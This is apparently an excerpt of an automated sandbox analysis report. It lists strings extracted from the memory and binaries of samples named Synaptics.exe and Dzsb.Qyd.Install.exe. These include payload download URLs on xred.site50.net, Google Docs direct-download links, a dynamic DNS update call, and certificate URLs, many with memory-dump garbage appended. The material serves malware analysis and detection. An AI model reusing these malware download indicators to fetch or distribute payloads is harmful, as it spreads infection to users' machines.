                              Source: Synaptics.exe, 00000014.00000003.1976493494.00000000007F2000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000014.00000003.1935866964.00000000007FB000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000014.00000003.2017995324.00000000007F2000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000014.00000002.2140164000.00000000007F4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://freedns.afraid.org/api/?action=getdyndns&sha=a30fa98efc092684e8d1c5cff797bcc6135629787
                              Source: Synaptics.exe, 00000014.00000003.1976493494.00000000007F2000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000014.00000003.1935866964.00000000007FB000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000014.00000003.2017995324.00000000007F2000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000014.00000002.2140164000.00000000007F4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://freedns.afraid.org/api/?action=getdyndns&sha=a30fa98efc092684e8d1c5cff797bcc613562978e
                              Source: Dzsb.Qyd.Install.exe, 00000000.00000003.1252118782.0000000002320000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://freedns.afraid.org/api/?action=getdyndns&sha=a30fa98efc092684e8d1c5cff797bcc613562978h
                              Source: Dzsb.Qyd.Install.exe, Synaptics.exe.0.dr, ._cache_Dzsb.Qyd.Install.exe.0.drString found in binary or memory: http://ldap2.sheca.com/CA13/RA12050100/CRL4903.crl0
                              Source: Dzsb.Qyd.Install.exe, Synaptics.exe.0.dr, ._cache_Dzsb.Qyd.Install.exe.0.drString found in binary or memory: http://ldap2.sheca.com/root/shecaG2-1.der0
                              Source: Dzsb.Qyd.Install.exe, Synaptics.exe.0.dr, ._cache_Dzsb.Qyd.Install.exe.0.drString found in binary or memory: http://ocsp3.sheca.com/ShecaG2-1/shecaG2-1.ocsp05
                              Source: Amcache.hve.13.drString found in binary or memory: http://upx.sf.net
                              Source: Dzsb.Qyd.Install.exe, Synaptics.exe.0.dr, ._cache_Dzsb.Qyd.Install.exe.0.drString found in binary or memory: http://www.sheca.com/policy/0
                              Source: Dzsb.Qyd.Install.exe, 00000000.00000003.1252118782.0000000002320000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://xred.site50.net/syn/SSLLibrary.dl4
                              Source: ~$cache1.20.drString found in binary or memory: http://xred.site50.net/syn/SSLLibrary.dll
                              Source: Synaptics.exe, 00000003.00000002.1442035103.00000000022C0000.00000004.00001000.00020000.00000000.sdmp, Synaptics.exe, 00000014.00000002.2140924392.0000000002490000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://xred.site50.net/syn/SSLLibrary.dll6
                              Source: ~$cache1.20.drString found in binary or memory: http://xred.site50.net/syn/SUpdate.ini
                              Source: Synaptics.exe, 00000003.00000002.1442035103.00000000022C0000.00000004.00001000.00020000.00000000.sdmp, Synaptics.exe, 00000014.00000002.2140924392.0000000002490000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://xred.site50.net/syn/SUpdate.iniZ
                              Source: ~$cache1.20.drString found in binary or memory: http://xred.site50.net/syn/Synaptics.rar
                              Source: Dzsb.Qyd.Install.exe, 00000000.00000003.1252118782.0000000002320000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://xred.site50.net/syn/Synaptics.rarX
                              Source: Synaptics.exe, 00000003.00000002.1442035103.00000000022C0000.00000004.00001000.00020000.00000000.sdmp, Synaptics.exe, 00000014.00000002.2140924392.0000000002490000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://xred.site50.net/syn/Synaptics.rarZ
                              Source: Synaptics.exe, 00000014.00000003.2017353207.0000000007F64000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000014.00000002.2145760240.0000000007EFF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.goo
                              Source: Synaptics.exe, 00000003.00000002.1441338159.00000000006B0000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000003.1316708703.0000000005406000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.1445445710.0000000007224000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000014.00000002.2140164000.000000000073E000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000014.00000003.2018131759.0000000007E78000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/
                              Source: Synaptics.exe, 00000014.00000003.1976684823.0000000004CC5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/24
                              Source: Synaptics.exe, 00000003.00000002.1445445710.0000000007224000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/E
                              Source: Synaptics.exe, 00000014.00000003.1935043043.0000000004CCD000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/X5
                              Source: Synaptics.exe, 00000014.00000003.1976684823.0000000004C8B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/blecli
                              Source: Synaptics.exe, 00000014.00000003.1935043043.0000000004CCD000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/danci
                              Source: Synaptics.exe, 00000014.00000003.1976684823.0000000004C8B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/e.cn
                              Source: Synaptics.exe, 00000014.00000003.1935043043.0000000004CCD000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/ogleviD
                              Source: Synaptics.exe, 00000014.00000003.1976684823.0000000004C8B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/s-cn.c
                              Source: Synaptics.exe, 00000003.00000002.1450628098.000000000B2FE000.00000004.00000010.00020000.00000000.sdmp, Synaptics.exe, 00000014.00000002.2147396926.0000000008B3E000.00000004.00000010.00020000.00000000.sdmp, Synaptics.exe, 00000014.00000002.2155513902.0000000011C3E000.00000004.00000010.00020000.00000000.sdmp, Synaptics.exe, 00000014.00000002.2149007672.000000000B1FE000.00000004.00000010.00020000.00000000.sdmp, Synaptics.exe, 00000014.00000002.2150643930.000000000D8BE000.00000004.00000010.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0;
                              Source: Dzsb.Qyd.Install.exe, 00000000.00000003.1252118782.0000000002320000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSTmlVYkxhSDg5TzQ&export=downlo
                              Source: ~$cache1.20.drString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSTmlVYkxhSDg5TzQ&export=download
                              Source: Synaptics.exe, 00000003.00000002.1442035103.00000000022C0000.00000004.00001000.00020000.00000000.sdmp, Synaptics.exe, 00000014.00000002.2140924392.0000000002490000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSTmlVYkxhSDg5TzQ&export=downloadN
                              Source: Dzsb.Qyd.Install.exe, 00000000.00000003.1252118782.0000000002320000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downlo
                              Source: Synaptics.exe, 00000014.00000003.1976029257.0000000007EA3000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000014.00000002.2157449106.0000000012DBE000.00000004.00000010.00020000.00000000.sdmp, Synaptics.exe, 00000014.00000002.2143398296.000000000562E000.00000004.00000010.00020000.00000000.sdmp, Synaptics.exe, 00000014.00000002.2144280139.00000000069EE000.00000004.00000010.00020000.00000000.sdmp, Synaptics.exe, 00000014.00000002.2150542957.000000000D63E000.00000004.00000010.00020000.00000000.sdmp, Synaptics.exe, 00000014.00000002.2149408796.000000000BABE000.00000004.00000010.00020000.00000000.sdmp, Synaptics.exe, 00000014.00000002.2153972141.00000000109CE000.00000004.00000010.00020000.00000000.sdmp, Synaptics.exe, 00000014.00000002.2145200229.0000000007DFE000.00000004.00000010.00020000.00000000.sdmp, Synaptics.exe, 00000014.00000002.2150298538.000000000CFFE000.00000004.00000010.00020000.00000000.sdmp, Synaptics.exe, 00000014.00000002.2154328558.0000000010D8E000.00000004.00000010.00020000.00000000.sdmp, Synaptics.exe, 00000014.00000002.2154552401.000000001100E000.00000004.00000010.00020000.00000000.sdmp, Synaptics.exe, 00000014.00000002.2143770008.0000000005EEE000.00000004.00000010.00020000.00000000.sdmp, Synaptics.exe, 00000014.00000002.2150394353.000000000D27E000.00000004.00000010.00020000.00000000.sdmp, Synaptics.exe, 00000014.00000002.2151387295.000000000EA4E000.00000004.00000010.00020000.00000000.sdmp, Synaptics.exe, 00000014.00000002.2154448663.0000000010ECE000.00000004.00000010.00020000.00000000.sdmp, Synaptics.exe, 00000014.00000002.2149197132.000000000B5BE000.00000004.00000010.00020000.00000000.sdmp, Synaptics.exe, 00000014.00000002.2140924392.0000000002490000.00000004.00001000.00020000.00000000.sdmp, Synaptics.exe, 00000014.00000002.2149900627.000000000C73E000.00000004.00000010.00020000.00000000.sdmp, Synaptics.exe, 00000014.00000002.2150198288.000000000CD7E000.00000004.00000010.00020000.00000000.sdmp, Synaptics.exe, 00000014.00000002.2152674150.000000000F70E000.00000004.00000010.00020000.00000000.sdmp, Synaptics.exe, 00000014.00000002.2153346708.000000001010E000.00000004.00000010.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download
                              Source: Synaptics.exe, 00000003.00000002.1441338159.00000000006C4000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000014.00000002.2145760240.0000000007EFF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download#
                              Source: Synaptics.exe, 00000014.00000002.2146834309.0000000007FEC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download#:4
                              Source: Synaptics.exe, 00000003.00000002.1441338159.0000000000717000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.1441338159.00000000006C4000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.1446731024.00000000072BC000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000014.00000003.1935661100.0000000004C72000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000014.00000002.2142028960.0000000004C60000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download$
                              Source: Synaptics.exe, 00000014.00000002.2146834309.0000000007FEC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download$81
                              Source: Synaptics.exe, 00000003.00000002.1443067594.00000000053D9000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.1445445710.0000000007160000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000014.00000002.2146834309.0000000007FEC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download%
                              Source: Synaptics.exe, 00000014.00000002.2146834309.0000000007FF8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download%K$
                              Source: Synaptics.exe, 00000014.00000003.1976684823.0000000004CEE000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000014.00000003.1976493494.00000000007F2000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000014.00000003.2017995324.00000000007F2000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000014.00000002.2140164000.00000000007F4000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000014.00000003.1935043043.0000000004CCD000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000014.00000002.2142028960.0000000004CE1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download&
                              Source: Synaptics.exe, 00000014.00000002.2146834309.0000000007FEC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download&0j
                              Source: Synaptics.exe, 00000003.00000002.1441338159.00000000006C4000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.1445445710.000000000720D000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.1443067594.00000000053D9000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000014.00000003.2018131759.0000000007EA3000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000014.00000003.1976029257.0000000007EA3000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000014.00000002.2145760240.0000000007EFF000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000014.00000002.2146834309.0000000007FEC000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000014.00000003.2017353207.0000000007F17000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download(
                              Source: Synaptics.exe, 00000014.00000003.1976684823.0000000004CE3000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000014.00000003.1935043043.0000000004CCD000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000014.00000002.2142028960.0000000004CE1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download(.X
                              Source: Synaptics.exe, 00000003.00000002.1441338159.00000000006C4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download(opX
                              Source: Synaptics.exe, 00000003.00000002.1446731024.00000000072BC000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000014.00000003.1976684823.0000000004CF7000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000014.00000002.2145760240.0000000007EFF000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000014.00000002.2146834309.0000000007FEC000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000014.00000003.1935043043.0000000004CCD000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000014.00000002.2142028960.0000000004CE1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download)
                              Source: Synaptics.exe, 00000014.00000002.2140164000.0000000000787000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download)T
                              Source: Synaptics.exe, 00000014.00000002.2145229675.0000000007E3E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download)f#
                              Source: Synaptics.exe, 00000003.00000002.1441338159.00000000006C4000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.1445445710.000000000720D000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.1443067594.00000000053D9000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.1445445710.0000000007160000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000014.00000003.1976493494.00000000007F2000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000014.00000003.2017995324.00000000007F2000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000014.00000002.2140164000.00000000007F4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download-
                              Source: Synaptics.exe, 00000014.00000002.2146834309.0000000007FEC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download-;&
                              Source: Synaptics.exe, 00000003.00000002.1443067594.0000000005481000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download-c
                              Source: Synaptics.exe, 00000014.00000003.1976684823.0000000004CF7000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000014.00000003.1935043043.0000000004CCD000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000014.00000002.2142028960.0000000004CE1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download-cn.4
                              Source: Synaptics.exe, 00000014.00000002.2145229675.0000000007E3E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download-e/
                              Source: Synaptics.exe, 00000003.00000002.1445445710.0000000007160000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000014.00000003.2017353207.0000000007F17000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download.
                              Source: Synaptics.exe, 00000003.00000002.1443067594.0000000005481000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download.a
                              Source: Synaptics.exe, 00000014.00000003.2017353207.0000000007F64000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download.bdn.dev
                              Source: Synaptics.exe, 00000003.00000002.1443067594.0000000005481000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download.c0
                              Source: Synaptics.exe, 00000014.00000002.2146834309.0000000007FEC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download.ca
                              Source: Synaptics.exe, 00000003.00000002.1443067594.0000000005481000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download.cl
                              Source: Synaptics.exe, 00000003.00000002.1443067594.0000000005481000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000014.00000002.2146834309.0000000007FEC000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000014.00000002.2146834309.0000000007FF8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download.com
                              Source: Synaptics.exe, 00000014.00000002.2146834309.0000000007FEC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download.doub
                              Source: Synaptics.exe, 00000014.00000002.2146834309.0000000007FEC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download.gcp.
                              Source: Synaptics.exe, 00000014.00000002.2142028960.0000000004D36000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download.goog
                              Source: Synaptics.exe, 00000014.00000003.2017353207.0000000007F64000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download.googletagmanager-cn.com
                              Source: Synaptics.exe, 00000003.00000002.1443067594.0000000005481000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download.gx
                              Source: Synaptics.exe, 00000003.00000002.1443067594.0000000005481000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download.nD
                              Source: Synaptics.exe, 00000003.00000003.1316708703.0000000005406000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download.net
                              Source: Synaptics.exe, 00000003.00000002.1443067594.0000000005481000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download.o
                              Source: Synaptics.exe, 00000014.00000002.2145760240.0000000007EFF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download.p
                              Source: Synaptics.exe, 00000014.00000003.1976684823.0000000004CF7000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000014.00000003.1935043043.0000000004CCD000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000014.00000002.2142028960.0000000004CE1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download.pt
                              Source: Synaptics.exe, 00000003.00000002.1445445710.000000000720D000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.1446731024.00000000072BC000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000014.00000003.1935661100.0000000004C7F000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000014.00000003.1977210353.0000000004C82000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000014.00000002.2145760240.0000000007EFF000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000014.00000002.2142028960.0000000004D36000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000014.00000003.1976684823.0000000004D36000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000014.00000002.2142028960.0000000004C7C000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000014.00000003.2017353207.0000000007F17000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download/
                              Source: Synaptics.exe, 00000014.00000003.1976684823.0000000004CE3000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000014.00000003.1935043043.0000000004CCD000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000014.00000002.2142028960.0000000004CE1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download//
                              Source: Synaptics.exe, 00000003.00000003.1316708703.000000000543A000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.1443067594.0000000005442000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download/PX
                              Source: Synaptics.exe, 00000014.00000002.2151463286.000000000EBC0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download/d
                              Source: Synaptics.exe, 00000003.00000002.1441338159.0000000000717000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download/u
                              Source: Synaptics.exe, 00000003.00000002.1445445710.000000000720D000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.1441338159.0000000000665000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.1443067594.0000000005481000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000014.00000003.2018131759.0000000007EA3000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000014.00000003.1976493494.00000000007F2000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000014.00000002.2146834309.0000000007FF8000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000014.00000002.2142028960.0000000004D36000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000014.00000003.1976684823.0000000004D36000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000014.00000003.2017995324.00000000007F2000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000014.00000002.2140164000.00000000007F4000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000014.00000003.1935043043.0000000004CCD000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000014.00000002.2142028960.0000000004CE1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download0
                              Source: Synaptics.exe, 00000014.00000002.2152064699.000000000EC51000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download0Q
                              Source: Synaptics.exe, 00000003.00000003.1316708703.000000000543A000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.1443067594.0000000005442000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download0QU
                              Source: Synaptics.exe, 00000003.00000002.1441338159.00000000006C4000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.1446731024.00000000072BC000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.1443067594.00000000053D9000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000014.00000002.2145760240.0000000007EFF000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000014.00000003.2017353207.0000000007F17000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download1
                              Source: Synaptics.exe, 00000014.00000002.2140164000.000000000073E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download1/
                              Source: Synaptics.exe, 00000014.00000002.2146834309.0000000007FEC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download1W
                              Source: Synaptics.exe, 00000014.00000002.2145229675.0000000007E3E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download1d
                              Source: Synaptics.exe, 00000014.00000002.2145760240.0000000007EFF000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000014.00000003.2017353207.0000000007F17000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download2
                              Source: Synaptics.exe, 00000014.00000002.2140164000.000000000073E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download2-cn.com
                              Source: Synaptics.exe, 00000014.00000002.2140164000.000000000073E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download2.
                              Source: Synaptics.exe, 00000014.00000002.2142028960.0000000004C60000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download26
                              Source: Synaptics.exe, 00000014.00000002.2145760240.0000000007EFF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download3
                              Source: Synaptics.exe, 00000014.00000002.2146834309.0000000007FEC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download38$
                              Source: Synaptics.exe, 00000003.00000002.1441338159.00000000006C4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download3V
                              Source: Synaptics.exe, 00000003.00000002.1441338159.00000000006C4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download3_p3Y
